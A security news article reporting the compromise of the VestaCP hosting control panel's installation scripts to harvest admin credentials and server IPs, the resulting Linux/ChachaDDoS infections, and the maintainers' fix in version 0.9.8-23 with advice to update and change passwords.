Unknown attackers have compromised the official distribution of the VestaCP hosting control panel solution to harvest server IPs and admin credentials. That information was exploited to install malware with DDoS capabilities (Linux/ChachaDDoS) on victims’ web servers.
About the software
A web hosting control panel is a web-based interface provided by a web hosting service that allows users to manage their servers and hosted services.
There are many web hosting control panels out there.
Some are open source, other proprietary (cPanel, the most recognized name in control panels, falls into the latter category). Some work on specific platforms, others are cross-platform.
VestaCP is open source and can be installed on RHEL, CentOS, Debian and Ubuntu servers.
Were it not for the fact that the compromised servers were used for DDoS attacks and began using an abnormal amount of bandwidth, the compromise might have not been noticed for a while yet.
As it was, service providers began warning customers about it, and VestaCP users began complaining on the company’s online forum.
It took a while for the maintainers to figure out what happened.
“Our infrastructure server was hacked. Presumably using API bug in the release 0.9.8-20. The hackers then changed all installation scripts to log admin password and ip as addition to the distro name we used to collect stats,” they explained.
In fact, as one forum user discovered, this information was sent to vestacp.com, the official VestaCP domain. As the attackers presumably had access to the servers at the time, this is how it likely ended in their hands.
VestaCP maintainers also called in outside security experts from Arcturus Security, and they pinpointed another security vulnerability that was exploited in some of the cases, allowing attackers to perform a “timing attack on password reset.”
All of these issues have now been fixed with VestaCP v0.9.8-23 and users have been urged to update their server as soon as possible, as well as to change their admin passwords.
The new release also searches for the Linux/ChachaDDoS binary on the server and notifies server admins if it finds it so they can remove it.
Users can also easily check whether their admin credentials have been harvested by entering their server’s IP address here.
More details about the malware can be found in this ESET blog post.